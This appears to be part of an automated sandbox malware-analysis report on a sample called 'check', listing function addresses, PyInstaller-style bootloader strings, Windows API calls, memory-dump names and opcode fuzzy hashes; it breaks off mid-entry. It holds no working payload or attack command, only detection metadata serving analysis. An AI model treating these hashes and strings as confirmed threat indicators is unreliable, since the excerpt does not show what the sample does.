Could not allocate buffer for TOC!, xrefs: 00007FF6D9231B1B
Failed to seek to cookie position!, xrefs: 00007FF6D92319EE
Error on file., xrefs: 00007FF6D9231B8D
malloc, xrefs: 00007FF6D9231B22
Could not allocate memory for archive structure!, xrefs: 00007FF6D9231A61
Could not read full TOC!, xrefs: 00007FF6D9231B55

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 6a04d0c4c8a0b99f23b16d6d676f1581d6c74e17851155a383b4fbd0f348e88e
Instruction ID: 7fc454f65b2479deffcb7b7eb464dc652064e519023a5c35d5b85f2ef62507f0
Opcode Fuzzy Hash: 6a04d0c4c8a0b99f23b16d6d676f1581d6c74e17851155a383b4fbd0f348e88e
Instruction Fuzzy Hash: 8C81A271A2C68686FB60DF34D6412BD23A1EF49784F40443BE98DC778ADE3CE5A58B41

Function 00007FF6D9231470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6D92314DE
fread, xrefs: 00007FF6D92315E6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6D9231518
fseek, xrefs: 00007FF6D92314E5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6D923149F
malloc, xrefs: 00007FF6D923151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6D92315DF

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 60a4f7716322392174b45f0900a3bf04e5f00cb62b5f775a2b3fa26e9f7385d7
Instruction ID: c9ed7981ba855510da95719c5d49c91623534495b541f70b5cb420b8bb6f7fc7
Opcode Fuzzy Hash: 60a4f7716322392174b45f0900a3bf04e5f00cb62b5f775a2b3fa26e9f7385d7
Instruction Fuzzy Hash: 4141AE22A2864286FB10DF32DA015BD63A0FF59784F844537ED4D87B9ADE3CE566CB00

Function 00007FF6D9231210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6D92312EF
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6D923141E
1.3.1, xrefs: 00007FF6D9231249
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6D9231276
malloc, xrefs: 00007FF6D92312C1, 00007FF6D92312F6
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6D92312BA

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 096f828560730c5e91f8963ea1229aecabbed89a92b0e893cc7cf6d4f043b132
Instruction ID: ad7ce7ca3c07f7f25cc60a84db0743e5a5e0af9f5c510a71cc93153e832f4bc5
Opcode Fuzzy Hash: 096f828560730c5e91f8963ea1229aecabbed89a92b0e893cc7cf6d4f043b132
Instruction Fuzzy Hash: 8751EB22A2864245F6609F21E6413BE6291FF86794F44413BEE4DC77DAEF3CE565C700

Function 00007FF6D92336B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6D9233804), ref: 00007FF6D92336E1
GetLastError.KERNEL32(?,00007FF6D9233804), ref: 00007FF6D92336EB

Part of subcall function 00007FF6D9232C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232C9E
Part of subcall function 00007FF6D9232C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232D63
Part of subcall function 00007FF6D9232C50: MessageBoxW.USER32 ref: 00007FF6D9232D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6D9233790
Failed to obtain executable path., xrefs: 00007FF6D92336F3
\\?\, xrefs: 00007FF6D923375A
Failed to resolve full path to executable %ls., xrefs: 00007FF6D9233739
GetModuleFileNameW, xrefs: 00007FF6D92336FA

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 585cde4fa769333c8d83961654dc639aca5fdce2f323ae01494de5db9d73c94c
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: EA217451B3864291FA60AF31EE113BE2250BF88394F80023BD65DC66E9FE2CE625C740

Function 00007FF6D924BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924BE89

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
Instruction ID: e3c25026e63d4993e75f288f816e6889c8efd167e66809481010d392f14b8a76
Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
Instruction Fuzzy Hash: 06C1E822A2CB8691FB619F159A442BD3790FFA9B80F554133EA4E83795CF7CE4658F00

Function 00007FF6D9236360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LoadLibrary, xrefs: 00007FF6D92364AE
Failed to load Python DLL '%ls'., xrefs: 00007FF6D92364A7
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6D92363C7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6D9236456
ucrtbase.dll, xrefs: 00007FF6D92363DD
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6D9236407

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction ID: 4e080111de20cb8cc14282bb86548159ce5a5871706699cf3ae79cd0dae52d9d
Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction Fuzzy Hash: 21418031A28A8691FA21EF30E6552FE6325FF54344F80413BEA5C83699EF3CE529C740

Function 00007FF6D9245628 Relevance: 6.1, APIs: 4, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9245655
CreateFileW.KERNEL32 ref: 00007FF6D9245694
CloseHandle.KERNEL32 ref: 00007FF6D92456C9

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: 4bd8a6d6e3338396ce3581baafd89826b93fa237c69b7b37641e0a526bde3ee6
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: 96418122E2878183F7508F61965077D6260FBA87A4F109336E69C87AD5DF7CA5F08B00

Function 00007FF6D923CC3C Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D923CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6D923CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6D923CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF6D923CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6D923CD21

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 0a972299de8ad1186caadff4c1d0e0b737b202370ad94a3338b5272d79bdbaed
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 12316825E3820741FA64FF35AB223BD2291AF51784F44443BED4ECB2E7CE2DA8248700

Function 00007FF6D924013C Relevance: 3.2, APIs: 2, Instructions: 177
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9240180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9240277

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 8368bc43de5a3acd4f69b612e6b4baf8389e9f017179884829e2410bd46df6f0
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 21513921B6964186F7649E25D60067E6A90BFADBA4F084732DD6D837C5CF3CE4A08F00

Function 00007FF6D924C134 Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6D924C2CD), ref: 00007FF6D924C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF6D924C2CD), ref: 00007FF6D924C18A

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: bb4afe6130949286cc25838fd858e07723a3901609699a80198f6091d4f1b534
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 2511C461728A8181EA20DF29BA141BD6361AB59FF4F544332EE7D877D9CE3CD0218B00

Function 00007FF6D924AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6D924A9D5,?,?,00000000,00007FF6D924AA8A), ref: 00007FF6D924ABC6
GetLastError.KERNEL32(?,?,?,00007FF6D924A9D5,?,?,00000000,00007FF6D924AA8A), ref: 00007FF6D924ABD0

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: de7b39f593eda9b874492d04c678607ffd7df2c00d9ac62b343a44834e533d5b
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: DA21A825F3868241FA959F51975037D16929FBC790F04423BD96EC77D6CE6CE4614B00

Function 00007FF6D924BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924BED4

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 3e305909ed9035c5480331e4093d61f1ec883b24cdc72669d962226897ab8005
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: E241B33292864187FA748E29AA4027D73A0EB6D791F100132EB8EC36D5CF6CE422CF51

Function 00007FF6D9237F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6D923803A

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: c6682db64852707600c43fb891f4de48ebc266699440c3858ac7b9af290251f5
Instruction ID: 21ec0ddbdae122eda9dff3e46af2f6e21c472cf5334bbe4eddc644348b9806e0
Opcode Fuzzy Hash: c6682db64852707600c43fb891f4de48ebc266699440c3858ac7b9af290251f5
Instruction Fuzzy Hash: 9721F721B2A65256FE509F72AA043BE9651BF59BC4F8C4436EE0D8F786CE7DE061C700

Function 00007FF6D924B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924B9C2

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: fa2df93afac728ddbd7c397525aacfbdeab6b082135f0530c083ec9ad802b4ef
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: FF318432E38A5285FB116F559A4137C26A0AFA8BA4F920137E95D873D2CF7CE4618F11

Function 00007FF6D9245F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9245EF9

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 379ab22525ff91d14c3339392c014db0841dc36d48757fae6998fd1d095aba69
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: B5117532A3C64181FA619F91A60057DA2A4BFADB84F454433EACDD7A96CF3DE4209F41

Function 00007FF6D9256354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9256377

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 7ac2e1b612b04652e23c232ae5a5e7088178a1190a66b353f5ca8a3b42d4da34
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 48219232A28A4186FBA18F18D54037E76A0FB94F64F544236E65EC76D9DF3CD8258B00

Function 00007FF6D92403BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9240410

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 569ffc40038bda92871681860ae47df8698c59a5521684fa61b4c36c5528688b
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: DC01DB21B6874140FA04DF529A0107DA691FFA9FE0F484632DE5C97BD6CF3CD4614B40

Function 00007FF6D9238E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

